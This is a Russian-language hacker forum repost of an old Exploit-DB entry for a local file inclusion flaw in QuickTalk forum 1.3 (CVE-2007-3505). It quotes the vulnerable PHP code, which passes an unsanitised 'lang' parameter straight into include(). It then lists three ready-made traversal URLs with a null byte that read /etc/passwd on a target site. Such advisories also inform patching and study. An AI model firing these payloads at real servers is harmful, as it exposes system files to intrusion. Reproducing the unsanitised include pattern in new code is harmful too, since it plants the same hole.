Exploit QuickTalk forum 1.3 - 'lang' Local File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
4115
Проверка EDB
  1. Пройдено
Автор
KATATAFISH
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-3505
Дата публикации
2007-06-27
Код:
###QuickTalk forum v1.3 Local File Inclusion###

#download: http://www.qt-cute.org/download/qtf13.zip

#found by: katatafish ([email protected])

#vulncode:
 $strLang = $_GET["lang"];
 include("language/$strLang/qtf_lang_reg.inc");

#exploits:

 http://www.site.com/[path]/qtf_checkname.php?lang=./../../../../../../../../../../etc/passwd%00
 http://www.site.com/[path]/qtf_j_birth.php?lang=./../../../../../../../../../../etc/passwd%00
 http://www.site.com/[path]/qtf_j_exists.php?lang=./../../../../../../../../../../etc/passwd%00

#thanks:str0ke

# milw0rm.com [2007-06-27]
 
Источник
www.exploit-db.com

Похожие темы